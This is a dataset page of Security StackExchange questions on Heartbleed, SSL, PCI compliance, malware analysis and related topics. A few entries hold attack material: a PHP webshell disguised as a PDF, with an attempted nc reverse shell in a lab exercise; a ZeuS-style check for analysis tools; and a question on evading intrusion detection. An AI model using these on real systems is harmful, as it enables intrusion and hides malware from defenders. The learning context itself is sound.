instruction stringlengths 24 29.9k |
|---|
Hi i am working with JSON. I want to protect my JSON . I am getting JSON on the User Interface side by a service call using a Jquery. Is there some mechanism by which the JSON which i am returning from my service is encrypted JSON and when i am receiving that JSON using JQuery i can decrypt it. But at the time of decry... |
For example, say I am transferring heavily-encrypted DVD/Blu-ray movies/game copies over the internet. However, I am using double or (+) encryption with keys required to decrypt the file using an encryption algorithm that may be uncommon. They would have these problems, no?
1.They can't guarantee it's what it's said to... |
I saw this post How to learn penetration testing at home? and I decide to ask about my self. I want to get into cyber security. So the post I send is about web security, I'm not interested in it. I had cover those topics:
Basic programming on C, intermediate(I can write a few tools that are helpful for example brute-fo... |
Let's assume that there are two nodes A and B connected over a network. Both have a single pre-shared symmetric key (e.g., AES-128) and exchange messages.
What is the recommended period, until the key should not be used anymore? Can they go on forever?
Is there a maximum number of messages after which a rekeying shou... |
I have a subordinate CA. The Enterprise root service was uninstalled from the network by accident and then migrated to a new box using the same key. This new server has a different server name. It worked for a few days and now the subordinate has two Delta-CRL locations and one is expired with an incorrect location poi... |
I've been reading about the ZeroAccess and looking into some bot's code source* and I found this piece of code which checks if filemon is running in the infected computer before running the bot.
int pmain3()
{
std::vector<DWORD> SetOfPID;
GetProcessID("filemon",SetOfPID);
if (SetOfPID.empty())
{
... |
I read on http://www.abuse.ch/?p=3499 that: ZeuS is now using an “IP list” which contains the IP addresses of other drones participating in the P2P botnet. An initial list of IP addresses is hardcoded in the ZeuS binary.
From what I understand, the bots use a hardcoded ip list to communicate with each other. what I do... |
I've seen a site that has been attacked by uploading php scripts (presumably some sort of shell, or code that loads a shell) to Wordpress' wp-content/uploads directory. Usually this directory is used for user uploaded content like photos etc. This particular server was configured to then run the malicious scripts for ... |
I recently bought a laptop which has OPAL compliant Self encrypting hard drive.
I wanted to know how I could use/check the status of the Hardware Encryption features of an OPAL drive (windows, linux or else)? How do I make sure it's active and working?
|
A site of ours has been targeted by some kind of strange attack and I am trying to work out exactly how it has happening. Basically, the strangest thing is that the logs seem to correspond to entirely different websites and thus is producing 404 errors all the time. Any ideas what kind of attack this is, how it is happ... |
Say I wanted to encrypt some sensitive information with a symmetric algorithm using a program on a computer. Is it possible that a hacker could retrieve the data,salt, iteration, cipher, keysize while the program is generating ciphered data and after? If possible, how can I prevent this?
|
Please see image.
Does anyone have any idea of whats going on?
They come and go as attached devices in my attached devices list.
I also attached my routers log for you all to see.
http://pastie.org/8997306
|
Application devlopement for mobile devices is generally more restrictive, i.e. the apps runs in a sandboxed environment, they have many limitations when accessing the filesystem, etc. compared to their desktop counterparts. What is the main reason for this?
|
While using Firefox to browse my forums, I noticed that a malicious user posted an image (via hotlinking, not by uploading to my server) with the extension .png which complies with the forum rules (allowing only .png, .gif, .jpg, .bmp, etc.). However, the user had used .htacess in a way that an HTTP Basic Auth box pops... |
My personal hotspot is accessed from an unknown site when I am in my home. Everyone in my home owns apple products but samsung android appears in network in system profiler.
Active services type hardware bsd
bluetooth dun ppp(pppserial) modem bluetooth
bloothto... |
i think for acquiring 100 % secure data transfer between forms on client side and c# code on server side ?
my tools :
i use IIS as my server and i wonder how can i reach for latest security that can be acquired in ASP.net forms and c# server side codes.
|
Background to this question is the ambivalence I assume with virtualization. Also to start directly with clarity: the term bluepill should here be a placeholder to denote "malware that uses virtualization to hide and fixate itself on an attacked system".
My question is how I should deal with the risk of a bluepill when... |
Mainly I'm interested in UK law on this, but I welcome input from any jurisdiction.
I discovered flaws in a service that undermined the security of all its user's data. This is a service where users are billed for usage. The flaw, if exploited would allow hackers to make charges to user's accounts.
I disclosed this fl... |
I have a small Truecrypt volume that contains just my password data (using Bruce Schneier's Password Safe application).
I'd like an offsite, secure, backup of that Truecrypt volume. Currently, I am using mainly Spideroak, but this question would apply to any such "cloud" storage services.
Backing the volume up to the c... |
I've been asked why do we trust organizations that certifies ISO 27001? From where did they get the authority and recognition to be able to certify ISO 27001?
For example, I can start a certification business and certify that a company is ISO 27001 compliant. However, I'm not recognized to do that, so my "signed paper"... |
We have a security system installed that takes pictures of the client user's screen and sends them to a server. The pictures are saved until they get to the point where they are old enough to be deleted. It's been useful for an investigative tool when we need to find out if a user has been up to suspicious activity. Th... |
So, we have this article:
http://www.engadget.com/2014/04/04/xbox-live-five-year-old-hacker/
Apparently, using nothing but spaces the local account (with an obviously saved password... I hope) was compromised. I am guessing that the password was TRIMMED before comparison and the dad had a password of merely spaces to b... |
The FBI currently prints and redacts documents using analog mechanisms. I'm curious to know if anyone has ever researched the accuracy of inferring the possible words or names. Certainly, given the static width of the characters in the variable width font-set, the limited space available, and the likelihood of characte... |
I wanted to log on to my account on my bank's website. The account is protected by a number of security checks. The first one is what really amounts to a username, a confidential one. It's an 8-digit numeric passcode (given to me by the bank), after entering which I need also to enter some personal data and a password.... |
I coded my own website and uploaded to a host. Some days ago I realised that in specific page suddenly redirects to an unknown websites, until 3-4 redirects.
The redirects are: mywebsite.com/smth-> es.webtraffapi01.selfip.com/smth -> 52342123.g03.info/?p=smth -> es.webtraff.com/smth
I have checked the file which gives ... |
I've seen a few methods to detect ARP Spoofing attacks through code(such as this), and ways to defend against these attacks through software and switches (like arp spoofing protection on LAN). How would I prevent arp spoofing with my own code(conceptually)? I wasn't sure if this would be better for Stackoverflow or thi... |
I want to use a smart card (or USB cryptotoken) with a PKI certificate for manual authorisation. Is this possible?
I want to put a file (e.g. a word file or even a simple text file) into a smart card. I also want to put a PKI certificate into the smart card. I issue this smart card to a user. The text file or word docu... |
I developed a web application in single-page application (SPA) architecture using Ext JS as client interface, but I have a trouble defining the right way of securing it with AJAX queries. How could I do that?
|
My wife called a GSM/3G number abroad and the call was dropped. She called again and she could hear the whole conversation repeated with the other party but with blank period from her side of the conversation.
How can this explained?
The call originated from Saudi and terminated in Lebanon.
|
So , how does the police find/monitor criminals' actions (eavesdropping) that do cyber crime(pornography , drug trafficking etc..) without breaking their privacy, and succesfully catch em and provide evidence for the court.
|
Here's one thing that keeps bugging me ever since I heard about the NSA revelations. From what I heard, NSA built a system that basically sees most of the internet, made of many subsystems which affect the networks. Judging by the leaked documents, they were pretty invasive, yet nothing was detected before. How is that... |
I recently started working on an eCommerce addition to a site I'm working on.In my research
looking for a way to do SSL without a certificate/a free certificate I came across PCI Compliance.I have been reading the PCI DSS Requirements from : https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf and to be honest... |
I am using the AF Networking 2 library and read that I need to include the server's certificate here.
The client should be able to tell that the certificate is valid when it connects to the server, so why do I need to include a copy in my code?
|
I've taken a graph of the amount of CVE reports concerning the JRE per Year.
Now as you can see this spiked in 2012-2013, which could have been guessed easily, if you look at the amount of news items concerning java in the past years. However, I'm having trouble finding an explanation why:
Did Java get more popular? ... |
Before I arrived at my current company we obtained the services of PCI consultant who gave us some very specific, if questionable, advice on encryption requirements.
The particular piece of advice I am suspicious of is that of making sure that cardholder data is encrypted as is moves across our internal (detached) netw... |
I was reading up on the history of the PGP encryption software when I realised its creator was under criminal charges for munitions export without a license for releasing the source code of PGP.
What was so dangerous about PGP at that point in time that it was an offence under the law? I mean, PGP is just an encryptio... |
I think this is related to this question, but I would like to know if there's also a way to prevent "third party" applications from seeing hardware IDs (motherboard, hard disks, and others), or giving them fake values, on real OS, not using a virtual machine. I'm interested here in modern mainstream desktop OSes, (and ... |
The German BSI (Federal Office for Information Security) claims to have got a list of 18 million email addresses and passwords – supposed to be the result of identity theft.
They allow to check if your own email address is part of this (or an older) list, which works like that:
Enter an email address at https://www.si... |
If I'm using Skype, Facebook, or another type of communication at my work, can the network administrator see my Skype and Facebook conversations, although its encrypted with SSL?
I found this text:
If your company is serious about security then it may have installed a
more advanced proxy like Blue Coat's ProxySG. Su... |
When conducting a penetration test, I run into difficulties because the defense system can identify an attack due to the high rate of requests, and then block the IP address
Is there a way to avoid this detection?
|
I recently encountered some news about the recently new Ransomware called CryptoDefense: it uses RSA 2048 to encrypt your valuables and offers the private key for a price. (It's already been solved since the private key is apparently cached locally)
My question however is how does this software actually encrypt large f... |
We're considering a 2 factor TOTP solution on a mobile phone. However, it would be much easier for the user to somehow send the OTP to the server by pushing a button, rather than manually typing in a code. Of course this would require an internet connection, but it would make it a much more user friendly solution.
Is ... |
For the last two days I've been seeing lots of lines in my /var/log/auth.log that look like:
sshd[xxxxx]: error: connect_to 0.gravatar.com port 80: failed
sshd[xxxxx]: error: connect_to 1.gravatar.com port 80: failed
sshd[xxxxx]: error: connect_to 2.gravatar.com port 80: failed
I don't think anything on my server uses... |
How do I mount my iphone to look at it's files forensically? I have FTK Imager (the only free program I could find) but it doesnt mount it as a drive and I can't seem to take a forensic image of the iphone. I am looking to get the cell tower logs (Cells.plist) file and I cant find a program or method to do it.
The pho... |
On my old ISP's DNS servers, sometimes https://www.facebook.com would return a cert for Akamai instead of Facebook. What I don't understand is that changing my DNS server to Googles (8.8.8.8) fixes the issue.
Any ideas? I have reproduced this on more than one occasion, but I still wouldn't rule it out as being mere coi... |
I have a small number of employees who use a company computer but these people aren't very tech-savvy. They use an email client and a messaging client.
I'm pretty sure they wouldn't click on a .exe or .zip file in an email without thinking, and I know that's one area of concern.
However, I'm thinking about images. In f... |
Is it possible, using some program or application, to lock Windows 7 so only a specific app can be used, for example Word, until a password is entered?
|
I read a lot about viruses being illegal, but at what point does a piece of code become a virus and become illegal? Information enters and leaves our computers on a daily basis and often times some information from our computer will enter someone elses computer in some form via the internet. Is there a legal definition... |
In relation to this GitHub issue on the Gittip project (which turned out to be a false alarm), what are the security implications, if any, of hardcoding into the git repo a test app's OAuth consumer key and secret for each provider that we use.
The intention is to make it as simple as possible for a new developer to sp... |
What are some simple methods of preventing my computer from being infected by USB drives and other storage devices? I'm not asking for any bullet-proof methods, just something that can prevent infection in the majority of cases.
For example, one thing I do is to create a folder named Autorun.inf on all my partitions an... |
If you haven't heard of the Heartbleed Bug, it's something to take a look at immediately. It essentially means that an attacker can exploit a vulnerability in many versions of OpenSSL to be able to gain access to a server's private key. It is not a theoretical threat, it is a demonstrable and reproducible threat. See t... |
CVE-2014-0160
http://heartbleed.com
This is supposed to be a canonical question on dealing with the Heartbeat exploit.
I run an Apache web server with OpenSSL, as well as a few other utilities relying on OpenSSL (as client). What should I do to mitigate the risks?
The bug dissected
Check if your site is vulnerable (D... |
What should a website operator do about the Heartbleed OpenSSL exploit? mainly talks about what people running websites should do about Heartbleed.
What should end-users of websites be doing?
Do they need to change their passwords?
If so, should they be logging into websites and changing passwords immediately? Or shoul... |
OK, so I first heard about heartbleed a few hours ago through the stack exchange questions feed, and after a moments panic, realised that the only web servers I have secured via OpenSSL are on the internal network. Patched anyway, but now I have been scratching my head on whether or not other services are vulnerable. S... |
Does the Heartbleed bug affect WiFi networks secured by WPA2-EAP in TLS mode? Since it's using TLS to secure connections between the server and clients, is it possible to attack the server using the Heartbleed attack and read the memory, stealing the private SSL key from the server?
|
I've just installed the Perspetive addon in firefox.
When I'm vistit, for example google, Perspective says the following message:
Warning: Perspectives has NOT seen this certificate consistently.
What does that mean? Is my connection secure or what?
How can I make sure of that my SSL-encryption is secured and not fak... |
According to http://heartbleed.com/, memory contents can be leaked from the server to the client and vice versa.
Say that I have been banking in a separate browser profile (but under the same user). If another browser profile happened to be targeted by the Heartbleed attack, does this mean that my banking session was p... |
I need to store some sensitive user data in an SQL database and am looking into how to best secure it. From what I've read here, the obvious way to do this would be to encrypt the data using the user's password. But I still need the Administrator to be able to access and potentially modify this data which would not be ... |
I'm working on a website which was built few years ago in PHP and its riddled with vulnerabilities all over the place. Someone has already gained access to the admin panel and we want to secure the websites, and prevent future break-ins.
Simplest, but tedious solution is to go through each file manually and replace all... |
I need to identify the SQLI, DoS, XSS attacks from log file. At which field these attacks will reflect in log file. Please suggest me some idea and send materials to me.
|
We're analysing issue at work and I wondering how to find out if there's any binary with a statically compiled version of openssl which includes this bug.
Would it be possible to find a fingerprint from the code which contains the bug?
|
I've been hearing more about the OpenSSL Heartbleed attack, which exploits some flaw in the heartbeat step of TLS. If you haven't heard of it, it allows people to:
Steal OpenSSL private keys
Steal OpenSSL secondary keys
Retrieve up to 64kb of memory from the affected server
As a result, decrypt all traffic between th... |
If I have a web crawler (using a non-patched version of OpenSSL) that can be coaxed to connect to an evil https-site, can they get everything from my process memory? To attack a server you can keep reconnecting to get more 64kb blocks (if I understand correctly), but can a client be forced to reconnect many times, to g... |
When accepting public keys from someone setting up an identity provider for access to resources protected by a service provider using SAML 2.0, do you absolutely need to have a unique certificate? Is this covered in the SAML specifications?
If they don't, I assume that use of certificates as a layer of defense is rend... |
From what I know, the HeartBleed bug seems to occur around 15 hours ago. As per heartbleed.com, the HeartBleed bug was independently discovered by a team of security engineers at Codenomicon.
How did the public came to know about the news?
Where is the first online reference to the "HeartBleed" bug?
|
If I'm using 16-18 character-length passwords with 94 different possible values-per-character (lower alphas, upper alphas, numbers, and special characters), is there an equation I can use to calculate how many times a series of the same value will be presented?
What I'm trying to find out is with granular password co... |
For this question, please assume I have followed every possible security measure to secure my Linux server. Only I have access to the web server via one open SSH port. If there are security issues then that's a separate issue.
I'm using a cloud server - which I believe is server virtualisation.
Now, I take my brilliant... |
Is there a way to determine as an end-user which HTTPS sites use OpenSSL? Due to heartbleed it is recommended that clients change their passwords that were sent over TLS recently as private keys may have been compromised so eavesdropping and MitM attacks were possible.
However, I haven't seen any notices from any HT... |
Are Apache Tomcat servers using Tomcat Native & APR vulnerable to the HeartBleed OpenSSL bug, or does this layer insulate them?
http://tomcat.apache.org/native-doc/
HeartBleed OpenSSL bug information: http://heartbleed.com/
On my Apache Tomcat server, I have:
A vulnerable version of OpenSSL
Built and installed APR
Bui... |
I am writing an application that serialises objects and then saves the resultant XML in an encrypted file.
I am using an Initialisation Vector and a Salt both saved in the file for decryption so two files will not be the same even though they may contain the same data.
Is the fact that I will have a recognisable patter... |
TACK is an IETF draft that allows certificate pinning for a TLS web server, provided the clients' browsers support it. Unlike the certificate pinning feature available with HSTS preloading, the server's operator is not committing to a particular certificate in the chain (and hence typically to a particular root or inte... |
There are websites which display user information, such as browser version and operating system
This website goes even further, and displays some additional information, such as desktop resolution, and also any secondary network interfaces. In my case, it detected my eth1 network interface 192.168.0.6
I have noticed t... |
Sorry if it is very open ended. All the news about the Heartbleed exploit has been flooding Google, and I can't figure out what it does. Is it fine to recompile?
|
Recently I received a new debit card which has both a magnetic stripe and a chip (as did my previous card).
I know the magnetic stripe can be easily copied whereas the chip system hasn't been compromised (yet?). I suppose the stripe is still there for legacy purposes, even though in the last years I've not seen nor hea... |
I've recently noticed that most of my activity with Google and its services goes through a local Google Global Cache server set up by our ISP. Since I don't fully trust the ISP, this has become a big concern for me.
Is it possible for the provider to read the encrypted requests that pass through GGC, thus getting acces... |
IIUC the Heartbleed vulnerability happens due to a bug in the C source code of OpenSSL, by performing a memcpy() from a buffer that is too short. I'm wondering if the bug would have been prevented automatically in other languages that have higher-level memory management systems than C or C++.
In particular, my understa... |
I was thinking that maybe the banners can give some insight as to whether a server is using OpenSSL. Is there any tell tale signs that a server is using OpenSSL?
-- Clarification:
Speaking in terms external; as in, if I went probing around the web or Shodan, is there a way to identify servers that use OpenSSL?
To thos... |
I have a fair number of security concerns with a client's operation and it made me think about all the security concerns I've observed and noticed throughout the years with different clients/jobs. Raising concerns with management was met with "too much time/money/resource" unless the security issue in question was expl... |
Are there any known instances of malicious security breeches exploiting the Heartbleed vulnerability? Or is there at present only a known vulnerability, albeit a very serious one?
|
pretty much the title, how to know if the Heartbleed vulnerability (for OpenSSL) affects other libraries like .NET's SSLStream or BouncyCastle.
(Sorry for ignorance, but have found no info on how to exploit, to see if is related to bufferoverruns and other things that shouldn't happen in Java/.NET).
|
I know that the vulnerability exploits the Heartbeat response which is a TLS feature. Now, when testing some of my important sites, there was some wording that scared me, namely:
TLS extension 15 (heartbeat) seems disabled, so your server is probably unaffected.
Does that means that there's another possible vulnerabi... |
Today my friend got email for the latest vulnerablility heartbleed.
But i could not find where i can subscribe so that i can also get emails about latest vulnerabilities
Can anyone please help me where should i need to subscribe and which things i need to subscribe for.
|
I've read lots of reports of the HeartBleed bug but have not been able to find a description at the source-code level, such as this one for the goto fail bug. Can anyone provide, or point to, such an explanation?
|
I built an application that generates certificate signing requests (CSRs) using the PHP OpenSSL module.
Is there a way that the HeartBleed bug can affect these (in use) private keys and CSRs that were generated while OpenSSL 1.0.1e was installed on the generating webserver?
|
If one has logged into a "heartbleed-vulnerable" site using OpenID, for example, using Google to log into StackExchange, does that mean that the Google password is now at risk as well?
|
I have read this post askbuntu, the step to fix the heartbleed vulnerability almost:
upgrade openssl.
generate new keys.
revoke the old certificates.
Some posts say attackers may have got your server's private keys.
If there's the possibility attackers can use your old certificates and private keys do MITM attack?
I'... |
Hope someone can clarify.
As I understand, in a DNS DDos Amplification attacks
Multiple DNS queries are sent to a vulnerable name server with the source IP spoofed to that of the target server.
The name server returns the response (with source port UDP 53) to the target server.
To the target server, the name server ha... |
In light of the Open SSL Heartbleed bug, I'd like to make sure I'm not putting any personal information in any system that is using Open SSL that is vulnerable.
So, from my browser (IE 11) how can I tell if 1. a website is using Open SSL, and 2. if so, what version of Open SSL?
I know I can view the security certifica... |
Background
I am using Linux Mint for one of my servers and have been trying to find out if the Linux Mint Debian Edition(LMDE) has updated their repositories with patches for the OpenSSL bug.
I have a different pure Debian server and Debian was quick to remedy the problem. However, after running an update on my LMDE ... |
I have been asked to research on a certain database then write down a specification document which covers Authentication, Authorization and Encryption. Has anyone ever come across such a documentation? I need to know if there is an example I can borrow from.
|
This is my page and class to encrypt the string entered and saved in database.
Each time, the Key__c is the same, as I take it from custom settings.
But when I enter abc and save two times, the entered value is different.
What is the reason?
<apex:page controller="encryptNewController">
<apex:form >
<ap... |
I see lot of OAUTH provider give us a secure key. What is the purpose of secure key in Facebook(and other provider) in OAUTH?
|
I am doing an exercise of PentesterLab, I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
Now I want to create a reverse shell using nc with following commands, but it does not work properly:
index.php?page=uplo... |
I run a server whose only public open port is 80, serving non-encrypted data over HTTP, not HTTPS. Is it affected by Heartbleed?
|
If one is using MongoDB enterprise, or built MongoDB from source using the -ssl option (as described here), is that MongoDB vulnerable to the heartbleed bug?
I know mongo needed openssl-devel to be installed on the machine for the build to work. But is it now using that vulnerable openssl version internally and now mon... |
See here: https://www.cacert.org/index.php?id=1
Chrome, Firefox and Internet Explorer warn that it is not trusted, essentially making the entire thing useless. If I want some kind of ssl certificate, I can just as well create my own with makecert.exe, the effect would be the same, wouldn't it: every browser would warn ... |
Here's a short question: does a hash function with configurable length exist?
And if not, why not? Would it be a problem?
|
The heartbeat extension to the TLS protocol seems like a useful idea for DTLS; according to the specification itself, it can be used to find out if a peer is still alive (and prevent firewalls from dropping the connection) without a renegotiation and for path MTU discovery.
However, I don't understand the motivation fo... |
I have to admit that I'm confused as to which services exactly are affected by Heartbleed. I have read http://heartbleed.com but all I read is that OpenSSL is affected. Great, but I don't really know where OpenSSL is used.
So concretely, are these services affected:
HTTPS (OK this one I think I know the answer)
SSH
HT... |
Questions about Heartbleed have been showing up in the popular questions list today since morning, from the security stack exchange to android
I have been reading many of them, most of them are technical and from a server administrators perspective so difficult to understand for the average user
These are a few simple ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.